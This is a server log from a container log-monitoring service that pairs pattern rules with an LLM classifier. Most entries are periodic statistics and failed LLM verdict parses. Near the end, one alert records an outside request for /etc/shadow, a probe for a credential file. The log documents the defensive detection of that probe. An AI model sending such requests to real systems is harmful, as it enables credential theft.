Mar 19 23:31:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:52.975186 [observer] Pipeline: processed=305 pattern_hits=270 llm_calls=34 llm_errors=34 learned=0 Mar 19 23:31:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:52.975211 [observer] Patterns: hash=268 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=35 Mar 19 23:32:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:32:22.975040 [observer] Pipeline: processed=308 pattern_hits=273 llm_calls=34 llm_errors=34 learned=0 Mar 19 23:32:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:32:22.975067 [observer] Patterns: hash=271 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=35 Mar 19 23:32:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:32:52.975946 [observer] Pipeline: processed=310 pattern_hits=275 llm_calls=34 llm_errors=34 learned=0 Mar 19 23:32:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:32:52.975973 [observer] Patterns: hash=273 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=35 Mar 19 23:33:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:33:22.975598 [observer] Pipeline: processed=314 pattern_hits=279 llm_calls=34 llm_errors=34 learned=0 Mar 19 23:33:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:33:22.975627 [observer] Patterns: hash=277 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=35 Mar 19 23:33:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:33:52.989400 [observer] Pipeline: processed=316 pattern_hits=281 llm_calls=34 llm_errors=34 learned=0 Mar 19 23:33:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:33:52.989426 [observer] Patterns: hash=279 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=35 Mar 19 23:34:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:34:22.974902 [observer] Pipeline: processed=320 pattern_hits=285 llm_calls=34 llm_errors=34 learned=0 Mar 19 23:34:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:34:22.974928 [observer] Patterns: hash=283 prefix=0 regex=0 
contains=2 deny=7 alert=0 suppress=0 misses=35 Mar 19 23:34:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:34:50.334078 [llm] Failed to parse verdict from: Mar 19 23:34:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:34:50.334117 [analyzer] LLM error for docker:captain-netdata-container: parsing verdict: unexpected end of JSON input Mar 19 23:34:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:34:50.334127 [LLM_ERROR] Source=docker:captain-netdata-container Line=2026-03-19T23:34:31.558567317Z 2026-03-19 23:34:31: tc-qos-helper.sh: WARNING: FireQOS is not instal... Mar 19 23:34:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:34:52.977076 [observer] Pipeline: processed=324 pattern_hits=287 llm_calls=36 llm_errors=35 learned=0 Mar 19 23:34:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:34:52.977115 [observer] Patterns: hash=285 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=37 Mar 19 23:35:10 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:35:10.121495 [llm] Failed to parse verdict from: Mar 19 23:35:10 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:35:10.121536 [analyzer] LLM error for docker:captain-netdata-container: parsing verdict: unexpected end of JSON input Mar 19 23:35:10 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:35:10.121545 [LLM_ERROR] Source=docker:captain-netdata-container Line=2026-03-19T23:34:31.561938200Z 2026-03-19 23:34:31: tc-qos-helper.sh: WARNING: Cannot find file '/us... 
Mar 19 23:35:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:35:22.975055 [observer] Pipeline: processed=328 pattern_hits=290 llm_calls=37 llm_errors=36 learned=0 Mar 19 23:35:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:35:22.975081 [observer] Patterns: hash=288 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38 Mar 19 23:35:30 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:35:30.374037 [llm] Failed to parse verdict from: Mar 19 23:35:30 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:35:30.374077 [analyzer] LLM error for docker:captain-netdata-container: parsing verdict: unexpected end of JSON input Mar 19 23:35:30 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:35:30.374087 [LLM_ERROR] Source=docker:captain-netdata-container Line=2026-03-19T23:34:31.563860191Z 2026-03-19 23:34:31: tc-qos-helper.sh: WARNING: Cannot find file '/et... Mar 19 23:35:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:35:52.976136 [observer] Pipeline: processed=331 pattern_hits=293 llm_calls=37 llm_errors=37 learned=0 Mar 19 23:35:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:35:52.976727 [observer] Patterns: hash=291 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38 Mar 19 23:36:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:36:22.988657 [observer] Pipeline: processed=335 pattern_hits=297 llm_calls=37 llm_errors=37 learned=0 Mar 19 23:36:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:36:22.988683 [observer] Patterns: hash=295 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38 Mar 19 23:36:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:36:52.974957 [observer] Pipeline: processed=339 pattern_hits=301 llm_calls=37 llm_errors=37 learned=0 Mar 19 23:36:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:36:52.974997 [observer] Patterns: hash=299 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38 Mar 19 23:37:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:37:22.989425 [observer] 
Pipeline: processed=341 pattern_hits=303 llm_calls=37 llm_errors=37 learned=0 Mar 19 23:37:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:37:22.989449 [observer] Patterns: hash=301 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38 Mar 19 23:37:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:37:52.977475 [observer] Pipeline: processed=345 pattern_hits=307 llm_calls=37 llm_errors=37 learned=0 Mar 19 23:37:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:37:52.977499 [observer] Patterns: hash=305 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38 Mar 19 23:38:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:38:22.980412 [observer] Pipeline: processed=347 pattern_hits=309 llm_calls=37 llm_errors=37 learned=0 Mar 19 23:38:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:38:22.980435 [observer] Patterns: hash=307 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38 Mar 19 23:38:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:38:52.976520 [observer] Pipeline: processed=350 pattern_hits=312 llm_calls=37 llm_errors=37 learned=0 Mar 19 23:38:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:38:52.976550 [observer] Patterns: hash=310 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38 Mar 19 23:39:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:39:22.979109 [observer] Pipeline: processed=353 pattern_hits=315 llm_calls=37 llm_errors=37 learned=0 Mar 19 23:39:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:39:22.979132 [observer] Patterns: hash=313 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38 Mar 19 23:39:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:39:52.979726 [observer] Pipeline: processed=355 pattern_hits=317 llm_calls=37 llm_errors=37 learned=0 Mar 19 23:39:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:39:52.979751 [observer] Patterns: hash=315 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38 Mar 19 23:40:22 ip-172-26-12-110 
observer[1562837]: 2026/03/19 23:40:22.975979 [observer] Pipeline: processed=359 pattern_hits=321 llm_calls=37 llm_errors=37 learned=0 Mar 19 23:40:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:40:22.976003 [observer] Patterns: hash=319 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38 Mar 19 23:40:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:40:52.988482 [observer] Pipeline: processed=361 pattern_hits=323 llm_calls=37 llm_errors=37 learned=0 Mar 19 23:40:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:40:52.988513 [observer] Patterns: hash=321 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38 Mar 19 23:41:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:41:22.975853 [observer] Pipeline: processed=367 pattern_hits=329 llm_calls=37 llm_errors=37 learned=0 Mar 19 23:41:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:41:22.975877 [observer] Patterns: hash=327 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38 Mar 19 23:41:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:41:52.974858 [observer] Pipeline: processed=369 pattern_hits=331 llm_calls=37 llm_errors=37 learned=0 Mar 19 23:41:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:41:52.974883 [observer] Patterns: hash=329 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38 Mar 19 23:42:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:42:22.974993 [observer] Pipeline: processed=372 pattern_hits=334 llm_calls=37 llm_errors=37 learned=0 Mar 19 23:42:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:42:22.975019 [observer] Patterns: hash=332 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=38 Mar 19 23:42:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:42:52.982745 [observer] Pipeline: processed=375 pattern_hits=335 llm_calls=39 llm_errors=37 learned=0 Mar 19 23:42:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:42:52.982776 [observer] Patterns: hash=333 prefix=0 regex=0 contains=2 deny=7 alert=0 
suppress=0 misses=40 Mar 19 23:43:03 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:43:03.205372 [llm] Failed to parse verdict from: Mar 19 23:43:03 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:43:03.205420 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 23:43:03 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:43:03.205429 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T23:42:41.166819338Z GET /robots.txt 200 1.435 ms - 26 Mar 19 23:43:04 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:43:04.504751 [llm] Failed to parse verdict from: Mar 19 23:43:04 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:43:04.504786 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input Mar 19 23:43:04 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:43:04.504795 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:42:41.166964701Z 216.73.216.37 - - [19/Mar/2026:23:42:41 +0000] "captain.admin.koviclo... 
Mar 19 23:43:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:43:22.990742 [observer] Pipeline: processed=379 pattern_hits=339 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:43:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:43:22.990767 [observer] Patterns: hash=337 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:43:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:43:52.977727 [observer] Pipeline: processed=383 pattern_hits=343 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:43:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:43:52.977753 [observer] Patterns: hash=341 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:44:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:44:22.988589 [observer] Pipeline: processed=385 pattern_hits=345 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:44:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:44:22.988616 [observer] Patterns: hash=343 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:44:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:44:52.976005 [observer] Pipeline: processed=389 pattern_hits=349 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:44:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:44:52.976034 [observer] Patterns: hash=347 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:45:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:45:22.985571 [observer] Pipeline: processed=391 pattern_hits=351 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:45:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:45:22.985597 [observer] Patterns: hash=349 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:45:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:45:52.976584 [observer] Pipeline: processed=394 pattern_hits=354 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:45:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:45:52.976615 [observer] Patterns: hash=352 prefix=0 regex=0 
contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:46:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:46:22.980409 [observer] Pipeline: processed=399 pattern_hits=359 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:46:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:46:22.980432 [observer] Patterns: hash=357 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:46:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:46:52.976221 [observer] Pipeline: processed=401 pattern_hits=361 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:46:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:46:52.976242 [observer] Patterns: hash=359 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:47:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:47:22.976026 [observer] Pipeline: processed=405 pattern_hits=365 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:47:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:47:22.976208 [observer] Patterns: hash=363 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:47:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:47:52.988421 [observer] Pipeline: processed=407 pattern_hits=367 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:47:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:47:52.988444 [observer] Patterns: hash=365 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:48:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:48:22.974795 [observer] Pipeline: processed=411 pattern_hits=371 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:48:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:48:22.974822 [observer] Patterns: hash=369 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:48:52.975862 [observer] Pipeline: processed=413 pattern_hits=373 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:48:52.975892 
[observer] Patterns: hash=371 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:49:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:49:22.974898 [observer] Pipeline: processed=416 pattern_hits=376 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:49:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:49:22.974927 [observer] Patterns: hash=374 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:49:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:49:52.975007 [observer] Pipeline: processed=419 pattern_hits=379 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:49:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:49:52.975031 [observer] Patterns: hash=377 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:50:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:50:22.990741 [observer] Pipeline: processed=421 pattern_hits=381 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:50:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:50:22.990772 [observer] Patterns: hash=379 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:50:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:50:52.974960 [observer] Pipeline: processed=425 pattern_hits=385 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:50:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:50:52.975007 [observer] Patterns: hash=383 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:51:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:51:22.985513 [observer] Pipeline: processed=427 pattern_hits=387 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:51:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:51:22.985539 [observer] Patterns: hash=385 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:51:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:51:52.975239 [observer] Pipeline: processed=433 pattern_hits=393 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:51:52 ip-172-26-12-110 
observer[1562837]: 2026/03/19 23:51:52.975261 [observer] Patterns: hash=391 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:52:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:52:22.976291 [observer] Pipeline: processed=435 pattern_hits=395 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:52:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:52:22.976321 [observer] Patterns: hash=393 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:52:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:52:52.975652 [observer] Pipeline: processed=438 pattern_hits=398 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:52:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:52:52.975677 [observer] Patterns: hash=396 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:53:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:53:22.975799 [observer] Pipeline: processed=441 pattern_hits=401 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:53:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:53:22.975981 [observer] Patterns: hash=399 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:53:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:53:52.974974 [observer] Pipeline: processed=443 pattern_hits=403 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:53:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:53:52.974997 [observer] Patterns: hash=401 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:54:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:54:22.976586 [observer] Pipeline: processed=447 pattern_hits=407 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:54:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:54:22.976610 [observer] Patterns: hash=405 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:54:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:54:52.981727 [observer] Pipeline: processed=449 pattern_hits=409 llm_calls=39 
llm_errors=39 learned=0 Mar 19 23:54:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:54:52.981771 [observer] Patterns: hash=407 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:55:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:55:22.975119 [observer] Pipeline: processed=453 pattern_hits=413 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:55:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:55:22.975140 [observer] Patterns: hash=411 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:55:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:55:52.978906 [observer] Pipeline: processed=455 pattern_hits=415 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:55:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:55:52.978932 [observer] Patterns: hash=413 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:56:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:56:22.975297 [observer] Pipeline: processed=458 pattern_hits=418 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:56:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:56:22.975321 [observer] Patterns: hash=416 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:56:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:56:52.975127 [observer] Pipeline: processed=463 pattern_hits=423 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:56:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:56:52.975151 [observer] Patterns: hash=421 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:57:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:57:22.990841 [observer] Pipeline: processed=465 pattern_hits=425 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:57:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:57:22.990868 [observer] Patterns: hash=423 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:57:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:57:52.975107 [observer] 
Pipeline: processed=469 pattern_hits=429 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:57:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:57:52.975136 [observer] Patterns: hash=427 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:58:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:58:22.975739 [observer] Pipeline: processed=471 pattern_hits=431 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:58:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:58:22.975767 [observer] Patterns: hash=429 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:58:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:58:52.975014 [observer] Pipeline: processed=475 pattern_hits=435 llm_calls=39 llm_errors=39 learned=0 Mar 19 23:58:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:58:52.975041 [observer] Patterns: hash=433 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=40 Mar 19 23:59:00 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:59:00.707524 [observer] Shutting down... Mar 19 23:59:00 ip-172-26-12-110 systemd[1]: Stopping VaultGuardian Observer... Mar 19 23:59:00 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:59:00.713196 [observer] Final stats: processed=475 pattern_hits=435 llm_calls=39 learned=0 Mar 19 23:59:00 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:59:00.713213 [observer] Shutdown complete Mar 19 23:59:00 ip-172-26-12-110 systemd[1]: observer.service: Deactivated successfully. Mar 19 23:59:00 ip-172-26-12-110 systemd[1]: Stopped VaultGuardian Observer. Mar 19 23:59:00 ip-172-26-12-110 systemd[1]: observer.service: Consumed 1.001s CPU time. Mar 19 23:59:00 ip-172-26-12-110 systemd[1]: Started VaultGuardian Observer. Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.729040 [observer] VaultGuardian Observer starting... 
Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.729115 [observer] Normalizer registry initialized Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.735517 [observer] Pattern store initialized (4 scopes) Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.735798 [observer] Analyzer pipeline ready Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.736038 [notifier] Generated default config at /var/lib/observer/notifications.yaml Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.736409 [logwatch] Notifications: Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.736561 [logwatch] ✗ webhook → not configured (set WEBHOOK_URL) Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.736677 [logwatch] ✓ email → drew@vaultdec.com Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.736768 [logwatch] ✗ sms → not configured (set TWILIO_SID + ALERT_SMS_TO) Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.736860 [logwatch] ✗ push/ios → not configured (set APNS_KEY_PATH + APNS_DEVICE_TOKEN) Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.736868 [logwatch] ✗ push/fcm → not configured (set FCM_CREDENTIALS_PATH + FCM_DEVICE_TOKEN) Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.737216 [observer] Starting container log watcher... 
Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.745554 [watcher] Found 8 running containers Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.745768 [watcher] Streaming logs for srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42 (ec84599232e6) Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.745871 [watcher] Streaming logs for srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp (e9fbb6ab33ae) Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.745956 [watcher] Streaming logs for captain-certbot.1.by454lfepw5mkzfa8e3karl8p (e1aa25883517) Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.746020 [watcher] Streaming logs for captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo (9d722e5b66d0) Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.746085 [watcher] Streaming logs for srv-captain--media-api.1.8iw1rx1hsebohsltxip133ftf (73fec0bbd4c4) Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.746148 [watcher] Streaming logs for captain-captain.1.oqvny8g95v3neveijmxdmdgto (080568bcaf31) Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.746271 [watcher] Streaming logs for srv-captain--media.1.td1ofal2g3beoqwzjiemvmuo4 (91c0395873e8) Mar 19 23:59:00 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:00.746362 [watcher] Streaming logs for captain-netdata-container (974270844dff) Mar 19 23:59:01 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:01.122464 [observer] LLM inference server connected Mar 19 23:59:19 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:19.531838 [ALERT] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Shadow password file access Line=2026-03-19T23:59:19.530979573Z 10.0.1.9 - - [19/Mar/2026:23:59:19 +0000] "GET /etc/shadow HTTP/1.0" 404 6603 "-" "curl/8.5.0" "98.152.173.124" Mar 19 23:59:30 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:30.751153 [observer] Pipeline: 
processed=5 pattern_hits=3 llm_calls=2 llm_errors=0 learned=0
Mar 19 23:59:30 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:30.751203 [observer] Patterns: hash=2 prefix=0 regex=0 contains=1 deny=1 alert=0 suppress=0 misses=2
Mar 19 23:59:44 ip-172-26-12-110 observer[1564563]: 2026/03/19 23:59:44.166698 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
